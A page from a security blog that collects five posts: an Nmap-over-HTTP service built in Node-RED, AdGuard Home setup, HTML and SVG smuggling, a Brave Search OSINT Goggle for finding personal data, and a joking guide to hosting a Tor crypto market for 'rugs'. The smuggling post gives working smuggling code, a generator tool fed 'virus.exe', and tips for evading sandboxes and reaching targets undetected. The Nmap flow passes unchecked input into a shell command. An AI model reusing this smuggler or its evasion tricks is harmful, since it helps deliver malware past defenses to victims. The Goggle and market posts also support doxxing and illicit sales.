Category: Blog

Blogpost

  • Node-RED, building Nmap as a Service

    Node-RED, building Nmap as a Service

    Introduction

    In the realm of cybersecurity, automation is not just a convenience but a necessity. Having a tool that can effortlessly construct endpoints and interconnect various security tools can revolutionize your workflow. Today, I’m excited to introduce you to Node-RED, a powerhouse for such tasks.

    This is part of a series of hacking tools automated with Node-RED.

    Setup

    While diving into the intricacies of setting up a Kali VM with Node-RED is beyond the scope of this blog post, I’ll offer some guidance to get you started.

    Base OS

    To begin, you’ll need a solid foundation, which is where Kali Linux comes into play. Whether you opt for a virtual machine setup or use it as the primary operating system for your Raspberry Pi, the choice is yours.

    Running Node-RED

    Once you’ve got Kali Linux up and running, the next step is to install Node-RED directly onto your machine, NOT in a Docker container since you will ned root access to the host system. Follow the installation guide provided by the Node-RED team.

    To ensure seamless operation, I highly recommend configuring Node-RED to start automatically at boot. One effective method to achieve this is by utilizing PM2.

    By following these steps, you’ll have Node-RED set up and ready to streamline your cybersecurity automation tasks.

    Nmap as a Service

    In this section, we’ll create a web service that executes Nmap scans, accessible via a URL like so: http://10.10.0.11:8080/api/v1/nmap?target=exploit.to (Note: Your IP, port, and target will differ).

    Building the Flow

    To construct this service, we’ll need to assemble the following nodes:

    • HTTP In
    • Function
    • Exec
    • Template
    • HTTP Response

    That’s all it takes.

    You can define any path you prefer for the HTTP In node. In my setup, it’s /api/v1/nmap.

    The function node contains the following JavaScript code:

    JavaScript
    msg.scan_options = "-sS -Pn -T3";
    msg.scan_target = msg.payload.target;
    
    msg.payload = msg.scan_options + " " + msg.scan_target;
    return msg;

    It’s worth noting that this scan needs to be run as a root user due to the -sS flag (learn more here). The msg.payload.target parameter holds the ?target= value. While in production, it’s crucial to filter and validate input (e.g., domain or IP), for local testing, it suffices.

    The Exec node is straightforward:

    It simply executes Nmap and appends the msg.payload from the previous function node. So, in this example, it results in:

    Bash
    nmap -sS -Pn -T3 exploit.to

    The Template node formats the result for web display using Mustache syntax:

    <pre>
    {{payload}}
    </pre>

    Finally, the HTTP Response node sends the raw Nmap output back to the browser. It’s important to note that this setup isn’t suitable for extensive Nmap scans that take a while, as the browser may timeout while waiting for the response to load.

    You now have a basic Nmap as a Service.

    TODO

    You can go anywhere from here, but I would suggest:

    •  add validation to the endpoint
    •  add features to supply custom nmap flags
    •  stream result to browser via websocket
    •  save output to database or file and poll another endpoint to check if done
    •  format output for web (either greppable nmap or xml)
    •  ChatOps (Discord, Telegram bot)

    Edit 1:

    I ended up adding validation for domain and IPv4. I also modified the target variable. It is now msg.target vs. msg.payload.target.

    JavaScript
    function validateDomain(domain) {
      var domainRegex = /^(?!:<strong>\/\/</strong>)([a-zA-Z0-9-]+<strong>\.</strong>)+[a-zA-Z]{2,}$/;
      return domainRegex.test(domain);
    }
    
    function validateIPv4(ipv4) {
      var ipv4Regex =
        /^(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)<strong>\.</strong>(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)<strong>\.</strong>(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)<strong>\.</strong>(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)$/;
      return ipv4Regex.test(ipv4);
    }
    
    if (validateDomain(msg.payload.target) || validateIPv4(msg.payload.target)) {
      msg.passed = true;
      msg.target = msg.payload.target;
      return msg;
    }
    
    msg.passed = false;
    return msg;
    

    The flow now looks like this, and checks the msg.passed. If it is false then it returns a HTTP 400 Bad Request, else it starts the Nmap scan.

  • AdGuard Home for security and blocking ads

    AdGuard Home for security and blocking ads

    Introduction

    In today’s digital age, the internet is saturated with advertisements and trackers, leading to slower browsing speeds and potential security threats. To combat these issues, leveraging AdGuard Home as a central ad blocker provides several key benefits, such as improved security and faster internet speeds. While browser plugins like “uBlock Origin” offer protection for individual devices within specific browsers, they fall short in safeguarding all devices, particularly those without browser support, such as IoT devices.

    Enhanced Security

    AdGuard Home blocks intrusive ads and potentially harmful websites before they even reach your devices. By filtering out malicious content, AdGuard Home significantly reduces the risk of malware infections and phishing attacks, safeguarding your personal information and sensitive data.

    Protecting Privacy

    Ads often come bundled with tracking scripts that monitor your online behavior, compromising your privacy. With AdGuard Home, you can prevent these trackers from collecting your data, preserving your anonymity and preventing targeted advertising based on your browsing habits.

    Faster Internet Speeds

    Advertisements consume valuable bandwidth and resources, leading to slower loading times and sluggish internet performance. By eliminating ads and unnecessary tracking requests, AdGuard Home helps optimize your network’s efficiency, resulting in faster page loading speeds and smoother browsing experiences.

    Open-Source and Transparent

    AdGuard Home is open-source software, meaning its source code is freely available for scrutiny and verification by the community. This transparency fosters trust and ensures that the software operates with integrity, free from hidden agendas or backdoors.

    Hosting AdGuard Home

    Now that you understand why you would want a central adblocker in your home network let’s get started in setting it up.

    First you need to decide if you want to host locally or in the cloud.

    Hosting locally:

    Benefits:

    • easier setup
    • more secure
    • private

    Drawbacks:

    • need a server

    Cloud hosting:

    Benefits:

    • no local server
    • better uptime

    Drawbacks:

    • more setup for same privacy and security

    Since DNS is not encrypted, like HTTPS for example, the cloud provider will most likely be able to see you DNS queries. You will need to use DNS-over-TLS or DNS-over-HTTPS. In a home network it is usually okay to use regular DNS, because AdGuard Home itself uses DNS-over-*S resolvers to get the final address. An example of Cloudflare’s resolvers

    https://dns.cloudflare.com/dns-query
    tls://1dot1dot1dot1.cloudflare-dns.com
    https://security.cloudflare-dns.com/dns-query
    tls://security.cloudflare-dns.com

    the regular DNS server would be 1.1.1.1

    Local Setup

    Depending on your setup, you might already have a server, Home Assistant, pfSesne firewall or nothing at all. I am going to assume you do not have any of the above. So first of all you will need to repuporse an old PC or somethign like a Raspberry Pi (which i highly recommend, i own 7).

    I have personally run AdGuard Home in a reasoably sized home network on a Raspberry Pi Zero W. I recommend a bigger one, but if you’re on a really tight budget, that is probably your best bet.

    Once you have a machine and it is running a Linux distribution of your choice, you now can install AdGuard Home either in a Container or directly.

    Adguard already has a pretty good documentation you can find here, i will shortly show you the 2 options:

    Docker

    Firstly you need to install Docker. Once you did this, all that is left to do is basically just run:

    docker run --name adguardhome\
        --restart unless-stopped\
        -v ./work:/opt/adguardhome/work\
        -v ./conf:/opt/adguardhome/conf\
        -p 53:53/tcp -p 53:53/udp\
        -p 67:67/udp -p 68:68/udp\
        -p 80:80/tcp -p 443:443/tcp -p 443:443/udp -p 3000:3000/tcp\
        -p 853:853/tcp\
        -p 784:784/udp -p 853:853/udp -p 8853:8853/udp\
        -p 5443:5443/tcp -p 5443:5443/udp\
        -d adguard/adguardhome

    and that is it. Now you can go to http://[YOUR-IP]:3000 and follow the steps.

    Direct

    Installing directly is just as simple:

    curl -s -S -L https://raw.githubusercontent.com/AdguardTeam/AdGuardHome/master/scripts/install.sh | sh -s -- -v

    That is it. You might have to copy the start command which will be shown in your terminal before you can set up your AdGuard in the browser.

    Web UI

    The steps for AdGuard in the Web UI are self explanatory so I did not go into detail here. You are basically good to go. I recommend 2 things:

    Go to Filters > DNS blocklists, then click on “Add blocklist” and select every Security list. I have also enabled all the “General” blocklists and not trouble.

    Go to Settings > DNS settings, I have the following upstream DNS server:

    quic://dns.adguard-dns.com
    # SWITCH
    https://dns.switch.ch/dns-query
    tls://dns.switch.ch
    # quad9
    tls://dns.quad9.net
    # cloudflare
    https://dns.cloudflare.com/dns-query
    tls://1dot1dot1dot1.cloudflare-dns.com
    https://security.cloudflare-dns.com/dns-query
    tls://security.cloudflare-dns.com

    Router Configuration

    I think most of the readers will have a Fritz!Box so this is what I will show here. The setup is probably very similar on your router. You basically just have to edit the DNS server settings in your router.

    Fritz!Box

    imageI did not show you my DNS Server IP by mistake. Scroll to the end to find out why. 9.9.9.9 is the Quad9 DNS Server, I use this in case my AdGuard goes down, otherwise I would not be able to browse the web.

    Bonus

    You are welcome to use my public AdGuard Home instance at 130.61.74.147, just enter it into your router. Please be advised that i will be able to see you DNS logs, which means I would know what you do on the internet… I do not care to be honest so you are free to make your own choice here.

  • Unveiling HTML and SVG Smuggling

    Unveiling HTML and SVG Smuggling

    Disclaimer:

    The information provided on this blog is for educational purposes only. The use of hacking tools discussed here is at your own risk.

    For the full disclaimer, please click here.

    Introduction

    Welcome to the world of cybersecurity, where adversaries are always one step ahead, cooking up new ways to slip past our defenses. One technique that’s been causing quite a stir among hackers is HTML and SVG smuggling. It’s like hiding a wolf in sheep’s clothing—using innocent-looking files to sneak in malicious payloads without raising any alarms.

    Understanding the Technique

    HTML and SVG smuggling is all about exploiting the blind trust we place in web content. We see HTML and SVG files as harmless buddies, used for building web pages and creating graphics. But little do we know, cybercriminals are using them as Trojan horses, hiding their nasty surprises inside these seemingly friendly files.

    How It Works

    So, how does this digital sleight of hand work? Well, it’s all about embedding malicious scripts or payloads into HTML or SVG files. Once these files are dressed up and ready to go, they’re hosted on legitimate websites or sent through seemingly harmless channels like email attachments. And just like that, attackers slip past our defenses, like ninjas in the night.

    Evading Perimeter Protections

    Forget about traditional attack methods that rely on obvious malware signatures or executable files. HTML and SVG smuggling flies under the radar of many perimeter defenses. By camouflaging their malicious payloads within innocent-looking web content, attackers can stroll right past firewalls, intrusion detection systems (IDS), and other security guards without breaking a sweat.

    Implications for Security

    The implications of HTML and SVG smuggling are serious business. It’s a wake-up call for organizations to beef up their security game with a multi-layered approach. But it’s not just about installing fancy software—it’s also about educating users and keeping them on their toes. With hackers getting sneakier by the day, we need to stay one step ahead to keep our digital fortresses secure.

    The Battle Continues

    In the ever-evolving world of cybersecurity, HTML and SVG smuggling are the new kids on the block, posing a serious challenge for defenders. But fear not, fellow warriors! By staying informed, adapting our defenses, and collaborating with our peers, we can turn the tide against these digital infiltrators. So let’s roll up our sleeves and get ready to face whatever challenges come our way.

    Enough theory and talk, let us get dirty ! 🏴‍☠️

    Being malicious

    At this point I would like to remind you of my Disclaimer, again 😁.

    I prepared a demo using a simple Cloudflare Pages website, the payload being downlaoded is an EICAR test file.

    Here is the Page: HTML Smuggling Demo <- Clicking this will download an EICAR test file onto your computer, if you read the Wikipedia article above you understand that this could trigger your Anti-Virus (it should).

    Here is the code (i cut part of the payload out or it would get too big):

    <body>
      <script>
        function base64ToArrayBuffer(base64) {
          var binary_string = window.atob(base64);
          var len = binary_string.length;
    
          var bytes = new Uint8Array(len);
          for (var i = 0; i < len; i++) {
            bytes[i] = binary_string.charCodeAt(i);
          }
          return bytes.buffer;
        }
    
        var file = "BASE64_ENCODED_PAYLOAD";
        var data = base64ToArrayBuffer(file);
        var blob = new Blob([data], { type: "octet/stream" });
        var fileName = "eicar.com";
    
        if (window.navigator.msSaveOrOpenBlob) {
          window.navigator.msSaveOrOpenBlob(blob, fileName);
        } else {
          var a = document.createElement("a");
          console.log(a);
          document.body.appendChild(a);
          a.style = "display: none";
          var url = window.URL.createObjectURL(blob);
          a.href = url;
          a.download = fileName;
          a.click();
          window.URL.revokeObjectURL(url);
        }
      </script>
    </body>

    This will create an auto clicked link on the page, which looks like this:

    <a href="blob:https://2cdcc148.fck-vp.pages.dev/dbadccf2-acf1-41be-b9b7-7db8e7e6b880" download="eicar.com" style="display: none;"></a

    This HTML smuggling at its most basic. Just take any file, encode it in base64, and insert the result into var file = "BASE64_ENCODED_PAYLOAD";. Easy peasy, right? But beware, savvy sandbox-based systems can sniff out these tricks. To outsmart them, try a little sleight of hand. Instead of attaching the encoded HTML directly to an email, start with a harmless-looking link. Then, after a delay, slip in the “payloaded” HTML. It’s like sneaking past security with a disguise. This delay buys you time for a thorough scan, presenting a clean, innocent page to initial scanners.

    By playing it smart, you up your chances of slipping past detection and hitting your target undetected. But hey, keep in mind, not every tactic works every time. Staying sharp and keeping up with security measures is key to staying one step ahead of potential threats.

    Advanced Smuggling

    If you’re an analyst reading this, you’re probably yawning at the simplicity of my example. I mean, come on, spotting that massive base64 string in the HTML is child’s play for you, right? But fear not, there are some nifty tweaks to spice up this technique. For instance, ever thought of injecting your code into an SVG?

    <svg
      xmlns="http://www.w3.org/2000/svg"
      xmlns:xlink="http://www.w3.org/1999/xlink"
      version="1.0"
      width="100"
      height="100"
    >
      <circle cx="50" cy="50" r="40" stroke="black" stroke-width="3" fill="red" />
      <script>
        <![CDATA[document.addEventListener("DOMContentLoaded",function(){function base64ToArrayBuffer(base64){var binary_string=atob(base64);var len=binary_string.length;var bytes=new Uint8Array(len);for(var i=0;i<em><</em>len;i++){bytes[i]=binary_string.charCodeAt(i);}return bytes.buffer;}var file='BASE64_PAYLOAD_HERE';var data=base64ToArrayBuffer(file);var blob=new Blob([data],{type:'octet/stream'});var fileName='karl.webp';var a=document.createElementNS('http://www.w3.org/1999/xhtml','a');document.documentElement.appendChild(a);a.setAttribute('style','display:none');var url=window.URL.createObjectURL(blob);a.href=url;a.download=fileName;a.click();window.URL.revokeObjectURL(url);});]]>
      </script>
    </svg>

    You can stash the SVG in a CDN and have it loaded at the beginning of your page. It’s a tad more sophisticated, right? Just a tad.

    Now, I can’t take credit for this genius idea. Nope, the props go to Surajpkhetani, his tool also gave me the idea for this post. I decided to put my own spin on it and rewrote his AutoSmuggle Tool in JavaScript. Why? Well, just because I can. I mean, I could have gone with Python or Go… and who knows, maybe I will someday. But for now, here’s the JavaScript code:

    const fs = require("fs");
    
    function base64Encode(plainText) {
      return Buffer.from(plainText).toString("base64");
    }
    
    function svgSmuggle(b64String, filename) {
      const obfuscatedB64 = b64String;
      const svgBody = `<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.0" width="100" height="100"><circle cx="50" cy="50" r="40" stroke="black" stroke-width="3" fill="red"/><script><![CDATA[document.addEventListener("DOMContentLoaded",function(){function base64ToArrayBuffer(base64){var binary_string=atob(base64);var len=binary_string.length;var bytes=new Uint8Array(len);for(var i=0;i<len;i++){bytes[i]=binary_string.charCodeAt(i);}return bytes.buffer;}var file='${obfuscatedB64}';var data=base64ToArrayBuffer(file);var blob=new Blob([data],{type:'octet/stream'});var fileName='${filename}';var a=document.createElementNS('http://www.w3.org/1999/xhtml','a');document.documentElement.appendChild(a);a.setAttribute('style','display:none');var url=window.URL.createObjectURL(blob);a.href=url;a.download=fileName;a.click();window.URL.revokeObjectURL(url);});]]></script></svg>`;
      const [file2, file3] = filename.split(".");
      fs.writeFileSync(`smuggle-${file2}.svg`, svgBody);
    }
    
    function htmlSmuggle(b64String, filename) {
      const obfuscatedB64 = b64String;
      const htmlBody = `<html><body><script>function base64ToArrayBuffer(base64){var binary_string=atob(base64);var len=binary_string.length;var bytes=new Uint8Array(len);for(var i=0;i<len;i++){bytes[i]=binary_string.charCodeAt(i);}return bytes.buffer;}var file='${obfuscatedB64}';var data=base64ToArrayBuffer(file);var blob=new Blob([data],{type:'octet/stream'});var fileName='${filename}';if(window.navigator.msSaveOrOpenBlob){window.navigator.msSaveOrOpenBlob(blob,fileName);}else{var a=document.createElement('a');console.log(a);document.body.appendChild(a);a.style='display:none';var url=window.URL.createObjectURL(blob);a.href=url;a.download=fileName;a.click();window.URL.revokeObjectURL(url);}</script></body></html>`;
      const [file2, file3] = filename.split(".");
      fs.writeFileSync(`smuggle-${file2}.html`, htmlBody);
    }
    
    function printError(error) {
      console.error("\x1b[31m%s\x1b[0m", error);
    }
    
    function main(args) {
      try {
        let inputFile, outputType;
        for (let i = 0; i < args.length; i++) {
          if (args[i] === "-i" && args[i + 1]) {
            inputFile = args[i + 1];
            i++;
          } else if (args[i] === "-o" && args[i + 1]) {
            outputType = args[i + 1];
            i++;
          }
        }
    
        if (!inputFile || !outputType) {
          printError(
            "[-] Invalid arguments. Usage: node script.js -i inputFilePath -o outputType(svg/html)"
          );
          return;
        }
    
        console.log("[+] Reading Data");
        const streamData = fs.readFileSync(inputFile);
        const b64Data = base64Encode(streamData);
        console.log("[+] Converting to Base64");
    
        console.log("[*] Smuggling in", outputType.toUpperCase());
        if (outputType === "html") {
          htmlSmuggle(b64Data, inputFile);
          console.log("[+] File Written to Current Directory...");
        } else if (outputType === "svg") {
          svgSmuggle(b64Data, inputFile);
          console.log("[+] File Written to Current Directory...");
        } else {
          printError(
            "[-] Invalid output type. Only 'svg' and 'html' are supported."
          );
        }
      } catch (ex) {
        printError(ex.message);
      }
    }
    
    main(process.argv.slice(2));

    Essentially it generates you HTML pages or SVG “images” simply by going:

    node autosmuggler.cjs -i virus.exe -o html

    I’ve dubbed it HTMLSmuggler. Swing by my GitHub to grab the code and take a peek. But hold onto your hats, because I’ve got big plans for this little tool.

    In the pipeline, I’m thinking of ramping up the stealth factor. Picture this: slicing and dicing large files into bite-sized chunks like JSON, then sneakily loading them in once the page is up and running. Oh, and let’s not forget about auto-deleting payloads and throwing in some IndexedDB wizardry to really throw off those nosy analysts.

    I’ve got this wild notion of scattering the payload far and wide—some bits in HTML, others in JS, a few stashed away in local storage, maybe even tossing a few crumbs into a remote CDN or even the URL itself.

    The goal? To make this baby as slippery as an eel and as light as a feather. Because let’s face it, if you’re deploying a dropper, you want it to fly under the radar—not lumber around like a clumsy elephant.

    The End

    Whether you’re a newbie to HTML smuggling or a seasoned pro, I hope this journey has shed some light on this sneaky technique and sparked a few ideas along the way.

    Thanks for tagging along on this adventure through my musings and creations. Until next time, keep those creative juices flowing and stay curious! 🫡

  • Using Brave Search Goggles for Recon

    Using Brave Search Goggles for Recon

    Introduction

    The world’s most potent OSINT (Open Source Intelligence) tools are search engines. They collect, index, and aggregate all the freely available information on the internet, essentially encapsulating the world’s knowledge. Nowadays, the ability to enter a topic in a search bar and receive results within milliseconds is often taken for granted. Personally, I’ve developed a profound appreciation for this technology by constructing my own search engines from scratch using Golang. But let’s dive into our topic – have you ever tried Googling your own name?

    Today, I want to shine a light on Brave Search (Brave Search docs). In 2022, Brave introduced a remarkable yet underappreciated feature known as Goggles. Described on the Brave Goggles website as follows:

    Goggles allow you to choose, alter, or extend the ranking of Brave Search results. Goggles are openly developed by the community of Brave Search users.

    Here’s a straightforward example:

    $boost=1,site=facebook.com

    This essentially boosts search results found on the facebook.com domain, elevating them higher in the results. The syntax is straightforward and limited; you can find an overview here.

    Pattern Matching:

    • Plain-text pattern matching in URLs: /this/is/a/pattern
    • Globbing capabilities using ’*’ to match zero, one, or more characters: /this/is/*/pattern
    • Use of ’^’ to match URL delimiters or end-of-URL: /this/is/a/pattern^

    Anchoring:

    • Use of ’|’ character for prefix or suffix matches in URLs.
      • Prefix: |https://en.
      • Suffix: /some/path.html|

    Options:

    • ‘site=’ option to limit instructions to specific websites based on their domain: $site=brave.com

    Actions:

    • ‘boost’: Boost the ranking of matched results: /r/brave_browser/$boost or $boost=4,site=test.de
    • ‘downrank’: Downrank the ranking of matched results: /r/google/$downrank
    • ‘discard’: Completely discard matched results: /this/is/spam/$discard

    Strength of Actions:

    • Adjust the strength of boosting or downranking actions (limited to a maximum value of 10): /r/brave_browser/$boost=3

    Combining Instructions:

    • Combine multiple instructions to express complex reranking functions with a comma ”,”: /hacking/$boost=3,site=github.com

    Finding Goggles

    Now that you have a basic idea of how to construct Goggles, you can find prebuilt ones here.

    A search for “osint” reveals my very own creation, the world’s first public 🎉 OSINT Goggle.

    When building your own Goggle, it needs to be hosted on GitHub or Gitlab. I host mine here on GitHub.

    DACH OSINT Goggle

    Here’s my code:

    ! name: DACH OSINT
    ! description: OSINT Goggle for the DACH (Germany, Austria, and Switzerland) Region. Find out more on my blog [exploit.to](https://exploit.to/)
    ! public: true
    ! author: StasonJatham
    ! avatar: #ec4899
    
    ! German Platforms
    $boost=4,site=telefonbuch.de
    $boost=4,site=dastelefonbuch.de
    $boost=4,site=northdata.de
    $boost=4,site=unternehmensregister.de
    $boost=4,site=firmen.wko.at
    
    ! Small boost for social media
    $boost=1,site=facebook.com
    $boost=1,site=twitter.com
    $boost=1,site=linkedin.com
    $boost=1,site=xing.com
    
    ! Online reviews
    $boost=2,site=tripadvisor.de
    $boost=2,site=tripadvisor.at
    $boost=2,site=tripadvisor.ch
    
    ! Personal/Business contact information, path boost
    /kontakt*$boost=3
    /datenschutz*$boost=3
    /impressum*$boost=3
    
    ! General boost, words included in pages
    *mail*$boost=1,site=de
    *mail*$boost=1,site=at
    *mail*$boost=1,site=ch
    *adresse*$boost=1,site=de
    *adresse*$boost=1,site=at
    *adresse*$boost=1,site=ch
    *verein*$boost=1
    
    ! Personal email
    *gmx*$boost=1
    *web*$boost=1
    *t-online*$boost=1
    *gmail*$boost=1
    *yahoo*$boost=1
    *Postadresse*$boost=1
    

    I believe it’s self-explanatory; the aim is to prioritize results that commonly contain personal information. However, it’s still a work in progress, and I plan to add more filters to these rules.

    Rule Development

    Rant Alert: Developing these rules can be quite frustrating. You have to push your rule to GitHub, then enter the URL in the Goggle upload and hope that you don’t encounter any cached results. The error messages received are often useless; most of the time, you just get something like “cannot compile.” In the future, I earnestly hope for an online editor or VSCode support. If the frustration persists, I might consider building it myself. Despite these challenges, writing these rules is generally straightforward.

    Future

    I hope the Brave team prioritizes this feature, and more people embrace it. They’ve hinted at more advanced filter rules akin to those found on Google, such as “intitle,” which, in my opinion, would make this the most powerful search engine on the planet.

    I also intend to focus on malware research, aiming to refine searches to uncover information about whether a particular file, domain, or email is known to be malicious.

    Please take a look at my Goggle and try it out for yourself. Provide feedback, spread the word, and create your own Goggles to give this feature the love it deserves.


    The title image is by Brave Software, Inc.  on Brave Search 

  • How to sell rugs online (fast) – hosting your own Dark web market

    How to sell rugs online (fast) – hosting your own Dark web market

    Disclaimer:

    The information provided on this blog is for educational purposes only. The use of hacking tools discussed here is at your own risk.

    For the full disclaimer, please click here.

    Welcome to the Dark Web Rug Emporium!

    So, you’ve made the bold decision to take your rug-selling business to the mysterious realms of the internet’s underworld? Congratulations on joining the league of adventurers! But before you take the plunge into this clandestine universe, let’s shed some light on what exactly the dark web is.

    Unveiling the Dark Web

    Picture the dark web as the shady back alleys of cyberspace, lurking beyond the reach of traditional search engines like Google or Bing. To access this hidden realm, you’ll need specialized software such as Tor (The Onion Router). Tor works like a digital disguise, masking your online activities by bouncing them through a global network of servers, rendering them virtually untraceable. Think of it as donning a digital ski mask while you explore.

    The Secrets Within

    Within this shadowy domain lies a treasure trove of hidden services known as onion sites. These sites sport the “.onion” suffix and are exclusively accessible via Tor. They operate on encrypted networks, providing users with a veil of anonymity for their online dealings and conversations. Yes, your potential rug emporium can thrive in this covert corner of the internet.

    Setting Up Shop

    But don’t think setting up shop in the dark web is as simple as putting up a “For Sale” sign. It demands a certain level of technical expertise and a deep understanding of anonymity protocols. But fret not, brave entrepreneur, for we’re about to embark on a journey to illuminate the path to rug-selling triumph in the internet’s shadows. So, buckle up, adjust your night vision goggles, and let’s dive in.

    For valuable insights into navigating the dark web as a rug salesman, I highly recommend checking out this enlightening talk: DEF CON 30 – Sam Bent – Tor – Darknet Opsec By a Veteran Darknet Vendor

    Establishing Your Den

    Now that we’ve suited up with our cybernetic fedoras and armed ourselves with the necessary tools, it’s time to establish our base of operations. Think of it as laying the foundation for your virtual rug emporium.

    Payment Processing: Decrypting the Coinage

    In the dark web marketplace, cash is so last millennium. Cryptocurrencies reign supreme, offering a level of anonymity and decentralization that traditional fiat currencies can only dream of. To cater to our discerning clientele, we’ll be accepting payments in Bitcoin and Monero, the preferred currencies of choice for denizens of the deep web.

    But how do we integrate these cryptocurrencies into our rug-selling empire? Fear not, for the internet offers solutions to meet our clandestine needs. Here are a few notable options to consider:

    1. Bitcart: A sleek and user-friendly payment processor. With its robust features and seamless integration, Bitcart ensures a smooth transaction experience for both buyers and sellers. Check out their website for a complete list of features.
    2. BTCPay Server: For the more tech-savvy rug merchants among us, BTCPay Server offers unparalleled flexibility and control over our payment infrastructure. This open-source platform allows us to self-host our payment gateway, giving us complete autonomy over our financial transactions. Check out their website for a complete list of features.

    Now that we’ve selected our payment processors, it’s time to lay the groundwork for our virtual storefront. We’ll be starting with a fresh Debian 12 LXC container, providing us with a clean slate to build upon. Let’s roll up our sleeves and prepare our base system for the dark web bazaar:

    Bash
    sudo su
    apt update && apt upgrade -y
    apt install git curl sudo -y
    curl -fsSL https://get.docker.com -o get-docker.sh
    sh get-docker.sh
    

    With our base system primed and ready, we’re one step closer to realizing our rug-selling dreams in the shadowy corners of the internet. But remember, dear reader, the journey ahead is fraught with peril and intrigue. So, steel yourself, for the dark web awaits.

    Bitcart

    Bitcart <store dash

    Effortless Deployment

    Deploying Bitcart is a breeze with our simplified steps:

    Replace YOUR_DOMAIN_OR_IP with your domain/IP

    Bash
    sudo su -
    apt-get update && apt-get install -y git
    if [ -d "bitcart-docker" ]; then echo "Existing bitcart-docker folder found, pulling instead of cloning."; git pull; fi
    if [ ! -d "bitcart-docker" ]; then echo "Cloning bitcart-docker"; git clone https://github.com/bitcart/bitcart-docker bitcart-docker; fi
    export BITCART_HOST=YOUR_DOMAIN_OR_IP
    export BITCART_REVERSEPROXY=nginx
    export BITCART_CRYPTOS=btc,xmr
    export BITCART_ADDITIONAL_COMPONENTS=tor
    cd bitcart-docker
    ./setup.sh
    

    This will add Tor support and make Monero (XMR) and Bitcoin (BTC) usable.

    After setup, navigate to http://DOMAIN_OR_IP/admin/register to register your first user, who will be designated as your admin.

    Real talk about Bitcart

    Using Bitcart to set up your online store is straightforward, but there’s a lot to learn to make the most of it. Check out their documentation to understand all the options and features.

    Running an online store may seem easy, but it’s actually quite complex. Even though Bitcart makes it easier, there are still challenges, especially if you want to use it with Tor. Tor users might have trouble loading certain parts of your store, which could reveal their identity.

    If you’re comfortable with WordPress, you might want to try Bitcart’s WooCommerce integration. But if you’re serious about building a dark web store, a custom solution is best. Bitcart offers a way to do this, which you can learn about here. You can use Python and Django to build it, which is great because Django lets you make pages with less JavaScript, which is important for user privacy.

    So, while Bitcart is a good starting point, building your own store tailored for the dark web ensures you have more control and can give your users a safer experience. With the right tools and approach, you can create a successful online store in the hidden corners of the internet.

    Harnessing Bitcart’s Capabilities

    If you’re contemplating Bitcart, delving into their documentation could revolutionize your approach. Crafting a tailored solution using their API opens up a plethora of opportunities.

    To bolster security, consider limiting Bitcart’s accessibility to your local machine, shielding it from prying eyes. Meanwhile, powering your marketplace storefront with platforms like PHP (Laravel)Django, or even Next.js provides scalability and flexibility.

    This strategy seamlessly integrates Bitcart’s robust backend features with the versatility of these frameworks, ensuring a smooth and secure shopping experience for your users.

    The reasoning behind this suggestion lies in the solid community support and reliability of battle-tested technologies. Platforms such as PHP (Laravel), Django, and Next.js boast extensive communities and proven track records—essential qualities in the dark web landscape.

    In the clandestine corners of cyberspace, resilience reigns supreme. A single vulnerability in your storefront could lead to catastrophe. By aligning with established frameworks, you gain access to a wealth of expertise and resources, bolstering your defenses against potential threats.

    Ultimately, adopting these trusted technologies isn’t merely a matter of preference—it’s a strategic necessity for safeguarding your online presence in the murky depths of the internet.

    BTCPayServer: Unveiling a Sophisticated Setup

    Setting up BTCPayServer demands a bit more effort due to its slightly complex documentation, especially when deploying on a local network. However, integrating Monero turned out to be surprisingly straightforward. Here’s an excellent guide on that: Accepting Monero via BTCPay Server.

    I’ve made slight modifications to the deployment script from the official documentation:

    Bash
    mkdir BTCPayServer
    cd BTCPayServer
    git clone https://github.com/btcpayserver/btcpayserver-docker
    cd btcpayserver-docker
    export BTCPAY_HOST="btcpay.local"
    export REVERSEPROXY_DEFAULT_HOST="$BTCPAY_HOST"
    export NBITCOIN_NETWORK="mainnet"
    export BTCPAYGEN_CRYPTO1="btc"
    export BTCPAYGEN_CRYPTO2="xmr"
    export BTCPAYGEN_ADDITIONAL_FRAGMENTS="opt-save-storage-xxs" # for demo
    export BTCPAYGEN_REVERSEPROXY="nginx"
    export BTCPAYGEN_LIGHTNING="clightning"
    . ./btcpay-setup.sh -i
    

    Note that this is a local setup, but it will be publicly accessible over the onion address.

    What distinguishes BTCPayServer is its sleek and modern admin interface. As someone who appreciates good design, I find its aesthetics truly appealing. Furthermore, it includes a built-in store and support for Tor, adding an extra layer of privacy.

    Customization is seamless with BTCPayServer’s highly adaptable UI. Additionally, its robust API empowers users to craft their own frontend experiences, ensuring flexibility and control.

    Their documentation provides clear and insightful examples, making development a delightful experience. Personally, as a fan of NodeJS, I found their NodeJS examples particularly helpful.

    In this demonstration, I’ll initiate a Fast Sync to expedite the process. However, in practical scenarios, exercising patience becomes crucial. Given my location in a less technologically advanced country like Germany, Fast Sync typically completes within a few hours on my 100Mbit/s line, whereas the regular sync could span over several days.BTC-XMR Sync

    Starting Fast Sync

    Initiating Fast Sync is straightforward. Either follow the documentation or run these commands in your BTCPayServer directory:

    Bash
    btcpay-down.sh
    cd contrib/FastSync
    ./load-utxo-set.sh
    Bash
    # Once FastSync has completed
    cd ../
    btcpay-up.sh

    After the snyc is done you can accept payments:a bitcoin payment

    (Please do not send any Bitcoin to this address. They will be lost.)

    Clearing Things Up

    Before we conclude, let’s debunk a common misconception about the “dark web.” It’s not merely a haven for illicit activities. While I used attention-grabbing examples to highlight these tools, it’s essential to recognize their legitimate applications.

    Gone are the days when Tor provided complete anonymity for nefarious actors. As your enterprise expands, tracing your activities becomes increasingly feasible, albeit challenging.

    I emphasize this point to underscore that the services and tools discussed here aren’t inherently unlawful. While they can be exploited for illicit purposes, they also serve valid functions.

    Consider the case of “Shiny Flakes,” who operated a drug trade through a conventional website without relying on Tor, evading detection for a significant duration. You can explore this story further on Netflix: Shiny Flakes: The Teenage Drug Lord. The takeaway is that we shouldn’t demonize technology solely based on its potential for misuse. Encryption, for example, is integral for safeguarding data, despite its association with ransomware.

    Understanding the dual nature of these technologies is crucial for fostering responsible usage and harnessing their benefits while mitigating risks. It’s a delicate balance between innovation and accountability in the ever-evolving landscape of cybersecurity.

    Crafting Your Own Payment Processor

